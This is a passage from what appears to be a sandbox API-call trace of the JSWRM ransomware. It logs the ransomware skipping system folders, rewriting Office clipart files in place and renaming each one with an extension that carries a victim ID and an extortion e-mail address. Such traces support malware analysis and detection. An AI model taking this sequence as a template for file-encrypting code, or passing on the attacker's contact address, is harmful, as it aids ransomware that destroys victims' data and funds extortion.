lstrcmpiW (lpString1="J0287417.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.901] lstrcmpiW (lpString1="J0287417.WMF", lpString2="system volume information") returned -1 [0088.901] lstrcmpiW (lpString1="J0287417.WMF", lpString2="msocache") returned -1 [0088.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0088.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287417.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287417.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287417.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0088.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0088.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287417.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287417.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287417.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0088.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0088.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0088.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287417.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287417.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.902] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=54972) returned 1 [0088.902] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6b0) returned 0x24d210 [0088.903] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xd6b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xd6b0, lpOverlapped=0x0) returned 1 [0088.907] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.908] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xd6b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xd6b0, lpOverlapped=0x0) returned 1 [0088.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.909] CloseHandle (hObject=0x314) returned 1 [0088.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0088.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0088.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0088.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0088.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0088.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0088.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0088.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.909] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287417.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287417.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287417.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287417.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0088.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0088.910] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3946e4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3946e4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x89a4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0287641.JPG", cAlternateFileName="")) returned 1 [0088.910] lstrcmpiW (lpString1="J0287641.JPG", lpString2=".") returned 1 [0088.910] lstrcmpiW (lpString1="J0287641.JPG", lpString2="..") returned 1 [0088.910] lstrcmpiW (lpString1="J0287641.JPG", lpString2="...") returned 1 [0088.910] lstrcmpiW (lpString1="J0287641.JPG", lpString2="windows") returned -1 [0088.910] lstrcmpiW (lpString1="J0287641.JPG", lpString2="recovery") returned -1 [0088.910] lstrcmpiW (lpString1="J0287641.JPG", lpString2="perflogs") returned -1 [0088.910] lstrcmpiW (lpString1="J0287641.JPG", lpString2="documents and settings") returned 1 [0088.910] lstrcmpiW (lpString1="J0287641.JPG", lpString2="$RECYCLE.BIN") returned 1 [0088.910] lstrcmpiW (lpString1="J0287641.JPG", lpString2="system volume information") returned -1 [0088.910] lstrcmpiW (lpString1="J0287641.JPG", lpString2="msocache") returned -1 [0088.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287641.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287641.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287641.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0088.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287641.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287641.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287641.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0088.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0088.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287641.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287641.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.911] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=35236) returned 1 [0088.911] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x89a0) returned 0x24d210 [0088.912] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x89a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x89a0, lpOverlapped=0x0) returned 1 [0088.916] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.916] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x89a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x89a0, lpOverlapped=0x0) returned 1 [0088.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.917] CloseHandle (hObject=0x314) returned 1 [0088.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0088.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0088.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0088.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0088.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0088.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0088.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.918] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287641.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287641.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287641.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287641.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0088.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0088.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.918] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3946e4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3946e4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3946e4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x42d1, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0287642.JPG", cAlternateFileName="")) returned 1 [0088.918] lstrcmpiW (lpString1="J0287642.JPG", lpString2=".") returned 1 [0088.918] lstrcmpiW (lpString1="J0287642.JPG", lpString2="..") returned 1 [0088.918] lstrcmpiW (lpString1="J0287642.JPG", lpString2="...") returned 1 [0088.918] lstrcmpiW (lpString1="J0287642.JPG", lpString2="windows") returned -1 [0088.918] lstrcmpiW (lpString1="J0287642.JPG", lpString2="recovery") returned -1 [0088.918] lstrcmpiW (lpString1="J0287642.JPG", lpString2="perflogs") returned -1 [0088.918] lstrcmpiW (lpString1="J0287642.JPG", lpString2="documents and settings") returned 1 [0088.918] lstrcmpiW (lpString1="J0287642.JPG", lpString2="$RECYCLE.BIN") returned 1 [0088.919] lstrcmpiW (lpString1="J0287642.JPG", lpString2="system volume information") returned -1 [0088.919] lstrcmpiW (lpString1="J0287642.JPG", lpString2="msocache") returned -1 [0088.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287642.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287642.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287642.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0088.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287642.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287642.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287642.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0088.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0088.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0088.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287642.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287642.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.920] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17105) returned 1 [0088.920] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x42d0) returned 0x24d210 [0088.920] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x42d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x42d0, lpOverlapped=0x0) returned 1 [0088.923] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.923] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x42d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x42d0, lpOverlapped=0x0) returned 1 [0088.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.923] CloseHandle (hObject=0x314) returned 1 [0088.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0088.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0088.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0088.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0088.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0088.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.924] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287642.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287642.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287642.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287642.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0088.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0088.924] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3946e4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3946e4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3946e4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3e91, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0287643.JPG", cAlternateFileName="")) returned 1 [0088.924] lstrcmpiW (lpString1="J0287643.JPG", lpString2=".") returned 1 [0088.924] lstrcmpiW (lpString1="J0287643.JPG", lpString2="..") returned 1 [0088.925] lstrcmpiW (lpString1="J0287643.JPG", lpString2="...") returned 1 [0088.925] lstrcmpiW (lpString1="J0287643.JPG", lpString2="windows") returned -1 [0088.925] lstrcmpiW (lpString1="J0287643.JPG", lpString2="recovery") returned -1 [0088.925] lstrcmpiW (lpString1="J0287643.JPG", lpString2="perflogs") returned -1 [0088.925] lstrcmpiW (lpString1="J0287643.JPG", lpString2="documents and settings") returned 1 [0088.925] lstrcmpiW (lpString1="J0287643.JPG", lpString2="$RECYCLE.BIN") returned 1 [0088.925] lstrcmpiW (lpString1="J0287643.JPG", lpString2="system volume information") returned -1 [0088.925] lstrcmpiW (lpString1="J0287643.JPG", lpString2="msocache") returned -1 [0088.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287643.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287643.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287643.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287643.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287643.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287643.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0088.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0088.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 